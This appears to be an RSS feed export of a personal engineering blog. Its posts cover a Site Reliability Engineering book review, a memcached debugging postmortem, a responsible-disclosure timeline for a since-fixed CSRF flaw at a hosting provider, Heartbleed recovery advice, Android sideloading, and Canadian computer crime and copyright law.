hashbang.ca https://hashbang.ca Mike Doherty Mon, 10 Jul 2017 04:55:39 +0000 en-US hourly 1 https://wordpress.org/?v=4.9.7 Book review: Site Reliability Engineering https://hashbang.ca/2016/04/07/book-review-site-reliability-engineering https://hashbang.ca/2016/04/07/book-review-site-reliability-engineering#comments Thu, 07 Apr 2016 06:01:59 +0000 https://hashbang.ca/?p=2070 Google has been working for about 2 years on a book about Site Reliability Engineering, the discipline and organization that keeps Google's large-scale systems running smoothly. "Site Reliability Engineering" was finally published last week. It spans some 500 pages, and offers a rare inside glimpse into how Google actually works. The authors are remarkably open, naming technologies and projects, and explaining how systems work. There may not be source code, but there's lots here that can be implemented outside Google. That makes it a great read for startups expecting to scale and small-to-medium tech companies that want to up their reliability game.

Right off the top, you should know I work as an SRE at Google, and I was involved in putting together a small part of Chapter 33, which talks about how SRE principles are found outside of tech. I had the opportunity to read that chapter prior to publication, and I thought it told a story well worth telling, so I've been excited about this book's release for a while now. The google.com/sre landing page has launched (and has lots of great resources), and the book went on sale (O'Reilly, Amazon, Google Books) on April 6 2016.

Obviously, the book isn't likely to have many earth-shattering revelations for me, coming from inside the organization that put this book together. Still, I'm interested in what we're saying to the rest of the tech community. Google has historically struggled to articulate well what SRE is. That uncertainty was something I had to wrestle with when I was first offered a job here. I'm very glad I decided to come here and be immersed in Google's SRE tech and culture. Google is remarkably good at running large systems, and SRE is the collection of practices that resulted in building the tech and culture that allow us to do that effectively.

The good news is that even though you don't have Borg or Chubby, you can still do a lot of the same things that Google SRE does. You do not have to give up and go home because you don't have the source code for Borgmon. Just use Prometheus. This book gives lots of practical advice that you can actually start using right away. It can also give you ideas of what to aim for as you start building larger and larger systems -- if you are going to write your own Borgmon, there's lots of great information on how to do it (and some on how not to -- the book is refreshingly honest about missteps).

The book (to my knowledge) doesn't talk about any technologies that weren't already been public. Papers and public talks on Piper, BorgMaglev, and more have come out in recent years, so the authors can talk about them publicly now. Specific technologies are interesting as case studies, but the principles of SRE are how Google made those investments, and the book is about SRE, not specific software projects or systems. For the most part, this book doesn't describe ready-made systems, but rather practices and principles that you can take individually as you start out, though they work best as a coherent whole. Luckily, there are tractable pieces of advice for lots of different kinds of readers. I talk more about that at the end of the review.

Overall, I'm impressed with how open the authors are. I've been surprised to see products and projects mentioned by name, so tech voyeurs may find the book interesting for that reason.There are some great "war" stories -- some I had heard, some I hadn't. The war stories are invariably instructive, and serve as a reminder that though Google may look from the outside like a duck calmly bobbing across a pond, underneath, the duck's feet are paddling like mad. SRE are the duck's feet. Our SRE teams are engineers who make it seem like Google's systems always works perfectly. They don't. They're pretty much always something failing -- but we've built systems to withstand failure of all scales, from a bad hard drive to a hurricane taking out a whole datacentre. The SRE book tries to show how you can too.

A guided tour

The book is divided into five sections: Introduction, Principles, Practices (the largest by far, ~60% of the book), Management, Conclusions. I want to talk briefly about specific chapters that I think will be especially interesting or valuable for readers. If that doesn't interest you, skip ahead to my reflections on the value of the SRE book for readers.

"Introduction" is actually important to set the stage for talking about specific practices, and I urge you not to skip it. The first chapter outlines what SRE is, and draws distinctions between SRE, system administration, and DevOps. The second chapter gives a high-level overview of Google's production environment, from Borg to storage, networking, and the development environment. As you read this, think of alternatives that are available externally: Apache Mesos and Kubernetes are mentioned specifically, but Nomad is a newcomer that also looks promising.

"Principles" expands on chapter 1, beginning with risk management.  This is key to understanding the tension inherent in SRE. If we wanted 100% stability, we'd never allow product teams to change anything. This kills the business. Instead, we want to manage the level of risk we take so we move as fast as possible without breaking things worse than our error budget allows.

Skipping ahead, chapters 6 and 10 discuss in some depth how Google monitors systems of such massive scale, and how we alert ourselves when things go wrong (it also discusses what "wrong" means, which is very important). This is perhaps as hard a problem as building the systems to be monitored in the first place, and pulling it off is a feat of software and systems engineering.

Chapter 7 talks about SRE's dedication to automation. Automation is incredibly valuable at our scale, but as Google's scale increases, we aspire to build more systems which go beyond this. We want systems that are autonomous. This is the only way we can ever hope to operate our largest systems, and the systems of the future.

One of the most important things about SRE is the culture. This is discussed in pockets throughout the book, but a key element is "postmortem culture". Chapter 15 explains what this means, and in particular why postmortems must be blameless.

Blameless postmortems are a tenet of SRE culture... You can't "fix" people, but you can fix systems and processes to better support people making the right choices when designing and maintaining complex systems.

This is really key. It is critical that postmortems be blameless so we can understand honestly and fully what happened, why the people involved did what they did, and how to make the system more reliable, even though it has unreliable components (power supply, humans, etc).

Another purpose of postmortems that isn't discussed until chapter 28 is that some postmortems are "teachable" -- they can give really great insight into how systems (don't) work, how incidents are handled, and also serve as proof that your postmortem culture takes the "blameless" part seriously.

Google's founders Larry Page and Sergey Brin host TGIF, a weekly all-hands held live at our headquarters in Mountain View, California, and broadcast to Google offices around the world. A 2014 TGIF focused on "The Art of the Postmortem," which featured SRE discussion of high-impact incidents. One SRE discussed a release he had recently pushed; despite thorough testing, an unexpected interaction inadvertently took down a critical service for four minutes. The incident only lasted four minutes because the SRE had the presence of mind to roll back the change immediately, averting a much longer and larger-scale outage. Not only did this engineer receive two peer bonuses immediately afterward in recognition of his quick and level-headed handling of the incident, but he also received a huge round of applause from the TGIF audience.

When we say "blameless" postmortems, we mean it, and you should too. Displaying that for new team members is an important part of the acculturation process. Teachable postmortems also let new team members understand the systems and how they interact. When I was preparing to interview with Google, I found this a really useful exercise: reading postmortems from companies that are more public with postmortems than is typical helped me think about larger-scale systems than I'd encountered previously. When I arrived at Google, I found that my team had a great collection of postmortems that I read throughout the onboarding process. That helped me get better at systems thinking in general, and learn about our systems specifically.

Chapter 17 discusses testing for reliability. This is one of the few chapters I felt was a let-down. While it discusses critical strategies like load testing and canaries, they weren't discussed in much detail. It's possible the authors didn't want to say more publicly, or the material was cut for length (if so, I would have cut elsewhere), but I was disappointed nonetheless. I'm not sure there's enough meat there for folks who don't know about these practices already to get a good grip on how they should incorporate them into their existing environment.

There's also a section that talks about the "order" of a software fault. I don't use those concepts in my work, and I don't know anyone who does either. Perhaps we should. And perhaps I should take a more positive view on this -- Google's SRE teams are not all the same, and we continually learn from one another. This may be something my team should learn and internalize. I'll be coming back to chapter 17 in the coming weeks.

A series of four chapters detail how Google does load balancing at various levels (chapters 19 & 20), and how Google handles overload and avoids cascading failure (chapters 21 & 22). These are interrelated topics, and deserve their collective 60 pages. We have standard server- and client-side implementations for backpressure and respecting backpressure, weighted round robin load balancing, backend subsetting, request priority/criticality and load shedding, query cost, and more. These are all important to get right in order to avoid overload and cascading failure, so letting everyone learn for their mistakes individually is a bad plan.

We learned this lesson the hard way: modeling capacity as "queries per second" or using static features of the requests that are believed to be a proxy for the resources they consume (e.g., "how many keys are the requests reading") often makes for a poor metric... A moving target makes a poor metric for designing and implementing load balancing... We often speak about the cost of a request to refer to a normalized measure of how much CPU time it has consumed.

The next pair of chapters, 23 and 24, cover distributed consensus systems and Borgcron, Google's distributed cron service, which uses distributed consensus. Distributed cron is harder than you might think, and the exercise of walking through the design in layers, building from single-machine cron up to Borgcron is instructive.

Part 4 concerns management of SRE teams. Since this is less interesting (to me) than the technical parts of the book, I want to skip ahead. I will point out that my team's work gets a mention at the end of chapter 32, in the section "Evolving Services Development: Frameworks and SRE Platform" (p. 451). We believe this sort of platform standardization effort is key for scaling Google SRE, and therefore for scaling Google systems.

Part 5 leads off with some stories about how other industries achieve high reliability. I'm quoted a few times, and this is the chapter I was asked to review pre-publication. I'm not sure how much value it adds to the book, but it is satisfying to see commonalities between other industries that require high levels of reliability, suggesting that Google SRE isn't totally on the wrong track.

Some reflections

With that whirlwind tour of some of the most notable parts of the book completed, I want to discuss the value this book can have. Is this just Google showing off, or is there value for the reader as well? Are the practices described in the book really practicable for smaller companies? I think so. There's lots of tractable advice in here for open-source projects, smaller companies, and even for large tech companies that don't have a mature SRE organization like Google's.

For open-source projects, many of the software development and testing practices described can be easily implemented. You should be designing with backpressure and graceful degradation in mind; with white-box monitoring in mind; with extensive testing that goes beyond unit tests; and so on.

For small companies, perhaps with a handful of engineers doing operations in a traditional sysadmin way, how can this book help you? First, it can show you a different path. But implementing all of this can seem overwhelming, and in fact, I don't think that's the right approach. Instead, you should start with the principles of SRE. You should alter your training and hiring so that sysadmin team gets the software development chops it may be missing. You should make sure you're doing blameless postmortems, and fixing all the action items when outages happen. You should have SLOs, and slow down release cadence when you exhaust your error budgets. In particular, look at chapter 30 "Embedding an SRE to Recover from Operational Overload" -- all you'll be missing is that SRE who embeds with the team having challenges. It'll be up to you to hire that person, and then make sure they're set up for success as they try to steer your ship. See chapters 1 and 28 as well.

For larger companies with lots of engineering talent, but without a mature SRE organization, the likely paths are more numerous, and depend on what you think you're not getting out of your engineering organization. If you still have a pure operations department, or if you do DevOps, but without a dedicated SRE team to build a platform for your DevOps folks, it may be time to change how your engineering organization is structured. Larger companies are also in the best position to look at the specific technological choices Google has made. For example, if you don't have standards for avoiding overload and cascading failure, invest the software engineering cycles into building that infrastructure. If you're having problems with load balancing, take cues from how Google is doing it.

Last, I want to say that the book was actually really enjoyable to read.

I strongly recommend that folks interested in DevOps, operations, reliability, and software engineering for scale read the book. It's a valuable glimpse into Google's inner workings, and it offers tractable advice, even if you don't have access to Google engineers and source code. You absolutely can find implementable ideas in here.

If you're interested in talking about SRE or the SRE book, a bunch of us hang out on Slack.

https://hashbang.ca/2016/04/07/book-review-site-reliability-engineering/feed 2
Diagnosing performance degradation under adverse circumstances https://hashbang.ca/2015/06/03/diagnosing-performance-degradation-under-adverse-circumstances https://hashbang.ca/2015/06/03/diagnosing-performance-degradation-under-adverse-circumstances#comments Thu, 04 Jun 2015 00:31:39 +0000 https://hashbang.ca/?p=923 [This post is a few years old and was never published. Recently, I was reminded about memcached slab imbalance, which in turn reminded me of this post.]

At work, we encountered a sudden and precipitous performance regression on one particular page of a legacy application. It's a Perl web application, running under mod_perl, using ModPerl::RegistryLoader to compile scripts at server startup, and Apache::DBI to provide persistent database connections.

Our users suddenly began complaining about one particular page being "three times slower than normal." Later examination of the Apache logs showed a 20x(!!) slowdown.

Investigating this performance problem was interesting because we didn't have good access to required data, and our technology choices slowed us down or completely prevented us from collecting it. Although we solved the mystery, the experience had several important lessons.

Over the course of several days, we examined a number of possibilities for the sudden performance degradation.

Initially, we thought it was related to a release we did on the same day the performance issues began being reported. Nobody on the team could think of anything relevant that was changed, but I read the entire diff between the two releases to confirm it. We hadn't touched the code, so we quickly started thinking about external factors: database, caching, server health, etc.

I was unable to reproduce the performance issue in a development environment, but when I disabled memcached, I saw pathological slowdowns on all pages. This was an interesting result, because we had started caching some frequently-accessed files in memcached. That could potentially fill the cache, or cause a slab imbalance, for example. These new items being cached were part of a separate application -- perhaps we were hitting limits on the number of connections.

But, examination of memcached statistics (what statistics we had available; recent versions of memcached provide much better data) showed that it was performing normally in the production environment. The cache hadn't reached maxbytes, and the server had memory available for allocation. There were no cache evictions, so slab imbalance wasn't to blame. The number of connections was nowhere near the limit.

So, we have two interesting data points now:

  1. With memcached, the application performs normally in a development environment.
  2. Without memcached, everything is slow in the development environment -- just like the performance issues in production, except for being isolated to one particular page.

So, we needed to get some data from production to see what's really happening there, instead of extrapolating from a development environment. We were able to obtain a clone of the server, hooked it up to the production database, and use SSH port forwarding to connect to the production server's memcached. This should be just like the live system, except with only one user accessing the application.

Lo and behold, I saw performance degradation for just the one page, just like on the live system. That's great -- now we need tracing or profiling data so we can see what's going on beneath the surface.

Well, the combination of technologies we chose makes getting DBI_PROFILE enabled surprisingly difficult. After wasting more hours than I care to admit, I gave up and reached for Devel::NYTProf instead. It turns out that this was probably a more useful tool in the end.

This application uses an in-house legacy ORM-like tool for a lot of database access. When I had disabled memcached entirely, I saw that all the object constructors were very slow -- this "ORM" relies very heavily on caching for performance. I had been pointing to the "ORM" as the culprit -- it was clearly performing poorly without a cache -- but it did have a cache in production. This difference was the last piece of the puzzle.

With the new profiling data from the production system, I could see that the ORM's object constructors were only performing poorly for a single type, rather than all of them. And we use that particular type's constructor on the affected page. It turns out it loads an entire database table, and attempts to store it as a single key in memcached. BINGO!

Memcached has a 1MB limit, and upon checking the size of the table, it just reached 1.1MB. We have a winner! (Or is that a loser?)

We don't need the whole table, because some of those records are inactive. Actually, we don't even need all the active records, because only some (usually zero!) are relevant for the current request. And really, we don't need the whole row, just one column. And we certainly don't need to store all this data as a single item in memcached. This is a whole huge bag of fail.

The easiest short-term fix is to upgrade memcached and set a per-item limit higher than 1MB. Recent versions of memcached allow setting the slab page size, which increases the per-item size limit. Instead of fixing the legacy code, this gives us a great reason for porting it to Catalyst.

Lessons learned

Tracking down this problem was extraordinarily frustrating because of the difficulties in getting valid data. We tried to extrapolate from a development environment for too long before trying to get data from a production-like environment. If we had been able to do that from the beginning, we would have solved the problem in a day instead of a week.

Another massive frustration was trying to get DBI_PROFILE to work with our choice of technologies. mod_perl alone isn't so bad, but ModPerl::RegistryLoader and Apache::DBI are complications that just make life difficult.

Finally, we didn't have good metrics on performance in the live environment. We didn't think anything was wrong until people complained, and we didn't know something was wrong until we pulled apache logs, and did ad-hoc analysis on the reponse times. We need real-time performance monitoring.

Old versions of memcached can be recompiled to increase the slab page size, but recent versions have a -I flag to control this at server startup. Likewise, recent versions of memcached provide statistics necessary to diagnose slab imbalance and other critical health indicators. For our case, you can monitor cmd_set - total_items -- anything other than zero is a problem. Also, make sure you check if the memcached set worked -- programmer "optimism" is really just programmer error. Finally, stability is not always worth flying blind -- consider upgrading.


  1. Be sure there is a problem before trying to solve it. If you can't tell this from your normal monitoring, enhance your monitoring.
  2. Be able to collect tracing/profiling data from your real production system if possible, or a production-like system otherwise. Know how to do this ahead of time, and have the process documented. You don't want to waste time figuring this out when you need data.
  3. Loading way more data than you need is probably a very bad idea, even if you hide the problem with exorbitant amounts of caching.
  4. Understand the limits of your tools. Memcached isn't a hard-disk where you can dump as much data as you want (and even hard disks are of finite capacity). Trying to cache an entire database table as a single item is totally wrong.
  5. Technology progresses for a reason. While stability is important, it probably isn't worth flying blind or doing without important features.
  6. Consider your tradeoffs carefully when dealing with legacy code, and take advantage of convincing reasons to dump it when they come along.
https://hashbang.ca/2015/06/03/diagnosing-performance-degradation-under-adverse-circumstances/feed 1
CSRF vulnerability at CloudAtCost.com https://hashbang.ca/2014/12/11/csrf-vulnerability-at-cloudatcost-com https://hashbang.ca/2014/12/11/csrf-vulnerability-at-cloudatcost-com#comments Thu, 11 Dec 2014 05:00:57 +0000 https://hashbang.ca/?p=2040 CloudAtCost.com provides low-cost virtual machines hosted in Canada. panel.cloudatcost.com is the management interface, where customers can install OS images, access a console, etc.A system security breach indicator light. Photo by Jeff Keyzer (CC-BY-SA)

A cross-site request forgery vulnerability was discovered in this web application. If a customer could be tricked into visiting a crafted URL while logged in, an attacker could change the victim's password, gaining access to the management interface.

In turn, this grants root access on all the victim's VMs, the ability to wipe or reinstall VMs, and potentially allows the attacker to spend the victim's money on CloudAtCost products and services.

Changing the password does not end the session or email the user, so the victim will not immediately notice anything is wrong. Exploitation of CSRF is difficult to detect on the server, so CloudAtCost is unlikely to notice anything is wrong either.

There is no evidence the vulnerability is being exploited, but exploitation is trivial and the impact of exploitation is severe. Exploitation is simple: build a URL of the following form:


Any method which gets the victim to load the crafted URL in their browser while logged in will cause their password to be changed, and the attacker can simply log in. Phishing emails are a common exploitation vector. A watering hole attack could also work: create a website that cloudatcost users would visit, or use one which already exists (such as https://forum.cloudatcost.com) and embed the crafted URL as an img resource, for example, and the attacker would achieve a similar effect. Other exploitation methods are certainly available, and practicable.


  • September 25, 2014: vulnerability discovered, and disclosed to CloudAtCost through a customer support ticket. Feedback is passed along, and the customer support ticket is closed.
  • September 25: vulnerability report is escalated via email. No reply.
  • October 2: vulnerability report is escalated via email, and a single point of contact at CloudAtCost is provided. Details are provided to that contact directly. No reply.
  • October 9: Direct contact is made with CloudAtCost and the Canadian Cyber Incident Response Centre (CCIRC), and full details are repeated. Follow-up is promised, but doesn't happen.
  • October 14: CCIRC reports that the vulnerability has been fixed. Testing shows that this is not the case. Clarification is requested from CloudAtCost. Deployment of the patch is scheduled for Nov 1.
  • November 3: The self-imposed date for deploying the patch (November 1) passes, and the application is still vulnerable. Clarification is requested from CloudAtCost. None is provided.
  • November 7: Information on the progress of deploying the patched application is requested. None is provided.
  • November 14: I spoke with a CloudAtCost representative on the phone, who said their team was having trouble getting a release out, and needed more time.
  • November 26: Information on the progress on deploying a fixed version of the web application was requested. No reply.
  • December 10: A hard deadline for public disclosure was set, and sent to CloudAtCost. The web application had been deployed in the past 3-4 days.
  • December 11: This disclosure is published.
https://hashbang.ca/2014/12/11/csrf-vulnerability-at-cloudatcost-com/feed 1
Legal issues in computer security research https://hashbang.ca/2014/04/19/legal-issues-in-computer-security-research Sat, 19 Apr 2014 04:04:42 +0000 https://hashbang.ca/?p=1932 This Thursday, I gave a talk at AtlSecCon 2014. The weather threw a wrench in the organizers' plans, but they managed to pull off a solid conference. Unfortunately, the talks weren't recorded this year. The slides are posted on speakerdeck, and are embedded below the fold.

I also reprised this talk at NSLUG, and recorded audio, now posted on SoundCloud, and also embedded below the fold.

Finally: late last year, I wrote 3 posts exploring Canada's computer crime laws (1, 2, 3) which were initial versions of work that eventually became two papers I submitted this semester for a directed studies course. If you were interested in those posts, I've embedded the final PDFs below. The talk is a condensed version of that work.

Download the PDF file .

Download the PDF file .

Recovering from Heartbleed https://hashbang.ca/2014/04/08/recovering-from-heartbleed https://hashbang.ca/2014/04/08/recovering-from-heartbleed#comments Tue, 08 Apr 2014 16:03:21 +0000 https://hashbang.ca/?p=1984 Heartbleed is a critical vulnerability in OpenSSL revealed yesterday. I'm not sure it could be more serious: it allows an attacker to connect to your server and use the TLS heartbeat extension to obtain 64k of server memory (and do it again to get another 64k and again and...) -- while leaving no traces in logs. That server memory might include primary key material (private keys), secondary key material (usernames and passwords), and collateral (memory addresses, canaries used to detect overflow, etc)

The researchers who discovered Heartbleed did a great job of outlining the severity of the vulnerability, as well as how to recover from it. For server operators, this is actually fairly straightforward: patch the OpenSSL vulnerability, install new keys, revoke the old ones, and be sure to restart every service that uses OpenSSL (or just reboot the whole server if in doubt). Unless your server was configured to use PFS, this still leaves all past traffic vulnerable to decryption, but even a leaked ticket key would compromise all the sessions it signed.

While these recovery steps are straightforward, they're not easy to carry out for large organizations. I have just one server, and no overhead. I was able to recover in about an hour and a half, and most of that was waiting for the CA's verification email process.

Secondary recovery

But what about recovering from potential compromise of secondary key material, and collateral?

Collateral, such as memory addresses, might be useful to an attacker, but are only useful for a short time. Upgrading to a patched version of OpenSSL is sufficient to make this data useless.

Secondary key material is of particular concern. Heartbleed made it possible for an attacker to obtain passwords from server memory, and/or obtain your private key, which they could then use to decrypt any traffic you thought was secure by virtue of using TLS. That includes, for example, passwords on the wire. So, as a website operator, you might want to assume that passwords have been compromised. Hopefully you have a way to force everyone to pick new passwords that you can deploy after you've completed your recovery procedures.

But as a user, how can you handle this proactively? Paranoid users might want to change all their passwords; less paranoid users might want to change a handful of high-value passwords. Regardless, how do you decide when to do that? There are probably many services that won't be asking you to change your password -- maybe because they didn't think of it, or maybe because they decided on your behalf that that's not needed. If you want to do it anyways, how do you know when to change your password? You want to make sure it is after they've completed their upgrades, but as soon as possible.

Do you change passwords now, which is as soon as possible, but might be while the server is still vulnerable? In this case, your password might be compromised either now or later by exploitation of heartbleed.

Or do you wait, and do it later? I think this makes more sense. This risks leaving a compromised password in place, but gives the server operator a chance to patch their systems so that when you finally do change the password, it won't be compromised (by heartbleed, at least). This isn't a trivial matter: major websites like Yahoo! were vulnerable, and recovering from heartbleed on such large sites will be very complex, and thus time-consuming. You absolutely do not want to assume that big web companies are fully recovered yet -- check out these scan results from a research team at the University of Michigan.

Detecting patched servers

So, how do you know when they're done patching? Ideally, they'll let you know. If you're curious now, you can test their services yourself. I've seen several tools making the rounds:

[Update: Predictably, there are bugs in the heartbleed detection scripts. I've updated the provided list accordingly.]

Please consider carefully whether you should be using these tools. Cybercrime legislation in both the US and Canada is pretty bad. You could land yourself in trouble by using these tools. Understanding your risk is the first step in determining if the risk is acceptable.

If you do use one, keep in mind that this only tells you whether the site in question has upgraded OpenSSL -- not whether they have replaced private keys, which is a critical step in recovery.

You can check the "valid from" date on the certificate, which might indicate they've done something, but it is possible to get a new certificate without changing the private key, so even this isn't sufficient. You'll really just have to wait for the website to let you know when they've replaced private keys, and then take their word for it.

Remember: you should not change your passwords until the website has completed their recovery. Ideally, they will let you know when that happens.

https://hashbang.ca/2014/04/08/recovering-from-heartbleed/feed 2
Mike will be a Googler https://hashbang.ca/2014/02/15/mike-will-be-a-googler https://hashbang.ca/2014/02/15/mike-will-be-a-googler#comments Sat, 15 Feb 2014 23:57:04 +0000 https://hashbang.ca/?p=1948 I spent about 3 months interviewing with a number of companies in Canada and the US, and I was lucky enough that list included an interview with Google's Site Reliability Engineering team. I went down to the Mountain View campus again in December for an on-site interview. Although the process was daunting, I made a good enough impression that they've invited me to join the SRE team in Mountain View when I graduate this May as a Systems Engineer.

I'll be relocating in June, and beginning work in July. If you're looking for a shared apartment in San Francisco starting in July, let's talk. I'd like to avoid sharing with someone I don't know, so if we talk now, I'll know you by then.

https://hashbang.ca/2014/02/15/mike-will-be-a-googler/feed 6
Upgrading encrypted Android devices https://hashbang.ca/2014/02/15/upgrading-encrypted-android-devices https://hashbang.ca/2014/02/15/upgrading-encrypted-android-devices#comments Sat, 15 Feb 2014 23:55:15 +0000 https://hashbang.ca/?p=1952 If you encrypt your Android device, the standard over-the-air (OTA) upgrades don't work, because /sdcard can't be mounted in recovery. Instead, Elad Alfassa suggests booting into recovery, creating a tmpfs on /sdcard and putting the new ROM in there before flashing it. On my device, running clockworkmod, that doesn't work, because it still tries and fails to mount /sdcard. It turns out that /sdcard is a symlink to /data/media, but even eliminating that doesn't help, clockworkmod still tries to mount the partition.

Instead, I used the new sideload facility, which lets you flash files sent from adb on your computer, instead of off the phone's internal storage. This effectively gets around the problem of /sdcard being unmountable, and is pretty easy.

First, boot into recovery, and select "install zip", then "install zip from sideload". You're given instructions to send the file with adb sideload update.zip on your computer. This requires android-tools to be installed and configured. You'll get a progress indication as the file is uploaded to the phone. Once complete, the phone will automatically begin installing it. Simply wait for the installation to finish, and reboot the phone. Enjoy the updated ROM!

https://hashbang.ca/2014/02/15/upgrading-encrypted-android-devices/feed 1
Exploring Canada's computer crime laws: Part 3 https://hashbang.ca/2013/11/06/exploring-canadas-computer-crime-laws-part-3 Wed, 06 Nov 2013 19:10:52 +0000 http://hashbang.ca/?p=1775 Since the exceptions in copyright law for encryption and security research don't apply if you're doing anything criminal, I next looked at the Criminal Code [PDF].

Unauthorized use of a computer

s 342.1 more closely resembles the CFAA, in that is seems to draw an analogy with trespass.

Unauthorized use of computer

342.1 (1) Every one who, fraudulently and without colour of right,

(a) obtains, directly or indirectly, any computer service,

(b) by means of an electro-magnetic, acoustic, mechanical or other device, intercepts or causes to be intercepted, directly or indirectly, any function of a computer system,

(c) uses or causes to be used, directly or indirectly, a computer system with intent to commit an offence under paragraph (a) or (b) or an offence under section 430 in relation to data or a computer system, or

(d) uses, possesses, traffics in or permits another person to have access to a computer password that would enable a person to commit an offence under paragraph (a), (b) or (c)

is guilty of an indictable offence and liable to imprisonment for a term not exceeding ten years, or is guilty of an offence punishable on summary conviction.

The "fraudulently and without colour of right" language immediately makes me think of the vagueness of "unauthorized" and "exceeding authorization" in the CFAA -- language which is widely regarded as problematic. Immediately following the quoted text, the Criminal Code lists several definitions. I omitted them for brevity, and because they didn't seem problematic to me. The terms "fraudulently" and "without colour of right" are not defined there, but they are explored in case law. "Essentials of Canadian Law: Computer Law" (2nd ed., by George S. Takach, 2003 [yes, seriously, 2003]) explains:

"Fraudulently" means dishonestly and unscrupulously, and with the intent to cause deprivation to another person.

The intent requirement here might be a useful get-out-of-jail card for security researchers who did not intend to deprive any other person. For example, I have a hard time imagining that prosecutors could successfully argue that weev intended to deprive others of... their blissful ignorance?

"Without colour of right" means without an honest belief that one had the right to carry out the particular action. To establish "colour of right," one would need to have an honest belief in a state of facts that, if they existed, would be a legal justification or excuse.

This escape clause might apply, for example, if someone sat down at a computer in the library thinking it was open for anyone to use, but it was really unlocked by someone who had stepped away. (Fun fact: I once nearly did this with a classified computer system, but was caught before doing more than jiggling the mouse. Oops! I honestly thought I was allowed to access that computer. If that had actually been true, then that would have been a legal excuse. That gives a colour of right, which would get me out of a charge under s 342.1)

However, "without colour of right" seems to simply postpone the difficult question of what use of computer is "unauthorized." The answer might be different if you ask a computer expert, as compared to a layperson. If "unauthorized" isn't in the eye of the beholder, you get around that problem, but simply replace it with the nonexistent definition provided by statute. The answer will presumably come from case law, but that doesn't help the people who shape the law by putting their liberty (and money - making good legal precedent is expensive!) on the line.

The language "directly or indirectly" in (a) is interesting -- that would seem to include social engineering where you trick someone into accessing a computer system on your behalf. I think that's probably a sensible inclusion.

Subsection (c) is quite broad, as it makes it an offence to use a computer with the intent to commit the offences in (a) or (b), or s 430 (mischief in relation to data). "Essentials of Canadian Law" explains that the rationale here is that the police shouldn't have to wait for actual harm to occur. So, this is like murder vs attempted murder, except the punishment is the same for both. That seems wrong -- we differentiate between murder and attempted murder in the Criminal Code, and sentence those convicted of these offences differently. Another potential issue: this section inherits all the problematic breadth of mischief in relation to data, which I talked about last time.

Exploring Canada's computer crime laws: Part 2 https://hashbang.ca/2013/11/05/exploring-canadas-computer-crime-laws-part-2 Tue, 05 Nov 2013 19:10:04 +0000 http://hashbang.ca/?p=1773 Since the exceptions in copyright law for encryption and security research don't apply if you're doing anything criminal, I next looked at the Criminal Code [PDF].

Mischief in relation to data

This is a digital counterpart to the mischief offence against physical property.

Mischief in relation to data

Mischief in relation to data

(1.1) Every one commits mischief who wilfully

(a) destroys or alters data;

(b) renders data meaningless, useless or ineffective;

(c) obstructs, interrupts or interferes with the lawful use of data; or

(d) obstructs, interrupts or interferes with any person in the lawful use of data or denies access to data to any person who is entitled to access thereto.


(2) Every one who commits mischief that causes actual danger to life is guilty of an indictable offence and liable to imprisonment for life.


(4) Every one who commits mischief in relation to property, other than property described in subsection (3),

(a) is guilty of an indictable offence and liable to imprisonment for a term not exceeding two years; or

(b) is guilty of an offence punishable on summary conviction.

(5) Every one who commits mischief in relation to data

(a) is guilty of an indictable offence and liable to imprisonment for a term not exceeding ten years; or

(b) is guilty of an offence punishable on summary conviction.

A strict reading of s 430(1.1)(a) means that altering data is illegal, but s 429(3) provides that it is not a crime to destroy anything if you own it, so long as you are not attempting fraud. (So, you can't burn down your house in an attempt to defraud your insurance company)

s 430(1.1)(c) and (d) seem to apply fairly straightforwardly to dDOS. Researchers like Molly Sauter are developing an understanding of at least some dDOS as legitimate political activity. Equating what we might understand as a digital sit-in with destructive computer crime is a serious category error. While civil disobedience in the physical realm is a crime, there is a large and widening gulf between the consequences for civil disobedience online and off, which I believe is fundamentally unjust.

s 430(2) provides for life in prison if your mischief causes actual danger to life. So, if you break into the computer systems controlling the power grid and wreak havoc, you might not see the light of day once convicted. It would be interesting to know how courts have judged the "actual danger to life" standard.

I included 430(4) because it doesn't apply to mischief to data because "property" is defined as "real or personal corporeal property." Note the dollar value requirement, which is missing from 430(5). The US CFAA had a $5000 requirement for the felony enhancement, which is already a laughably low bar, but the comparable statute in Canada has no bar at all. (I believe this felony enhancement was amended in 2008, but it isn't clear that the new requirements are much better.)

Given the abuses of the CFAA we've seen, the lack of requiring real damange should be disturbing. There should be a minimum monetary damage here before punishment kicks in -- and it should be real damages. The EFF's legal director Cindy Cohn gave a good explanation of how the CFAA counts up the $5000 of damages at DEF CON 11 -- we shouldn't make that same mistake.

Exploring Canada's computer crime laws: Part 1 https://hashbang.ca/2013/11/04/exploring-canadas-computer-crime-laws-part-1 Mon, 04 Nov 2013 19:10:54 +0000 http://hashbang.ca/?p=1737 As someone with an interest in technology, security, and the legal issues surrounding them, I often watch relevant legal cases with interest. Typically, those cases come from the United States. The CFAA has been in the news frequently of late, and not always in a good light. I was pleased to see Zoe Lofgren's proposed changes, which try to make the law less draconian.

This is typical for Canada -- we often see more about American news on topics like this than Canadian. I realized that I really didn't know what the law in Canada said about so-called computer crimes, although I've often wondered. A while back, I took an afternoon to do some reading. I was not happy when that afternoon ended. This is part one of a three-part series on what I found.

Nothing in this series of posts should be regarded as definitive. I'm not a lawyer, nor even a law student. I'm a computer science student with an amateur interest in the law.

Copyright Act

I started with the recent amendments to Canada's copyright law [PDF] because I knew from Kevin McArthur that it had implications for security research in Canada. He was right. There are two provisions which make computer security research difficult in Canada.

Encryption research

First, there are exceptions for encryption research.

Encryption research

30.62 (1) Subject to subsections (2) and (3), it is not an infringement of copyright for a person to reproduce a work or other subject-matter for the purposes of encryption research if

(a) it would not be practical to carry out the research without making the copy;

(b) the person has lawfully obtained the work or other subject-matter; and

(c) the person has informed the owner of the copyright in the work or other subject-matter.


(2) Subsection (1) does not apply if the person uses or discloses information obtained through the research to commit an act that is an offence under the Criminal Code.

Limitation  — computer program

(3) Subsection (1) applies with respect to a computer program only if, in the event that the research reveals a vulnerability or a security flaw in the program and the person intends to make the vulnerability or security flaw public, the person gives adequate notice of the vulnerability or security flaw and of their intention to the owner of copyright in the program. However, the person need not give that adequate notice if, in the circumstances, the public interest in having the vulnerability or security flaw made public without adequate notice outweighs the owner’s interest in receiving that notice.

The idea here is a good one -- nobody should be prevented from doing research on encryption because of copyright law. However, you might have noticed a few troubling requirements.

First, s 60.62(1)(c) requires that you've informed the copyright owner. This assumes that the copyright owner is known, and that you can contact them. Just how would you contact the copyright owner of GnuPG, for example? Do you have to contact all of them? Why should contacting them be mandatory? Requiring researchers to inform the copyright holder, thus probably identifying themselves, opens them to retribution. This is a well-known anti-pattern in security research, so it's not clear why the copyright law should privilege business at the expense of security researchers (and thus, indirectly, the public).

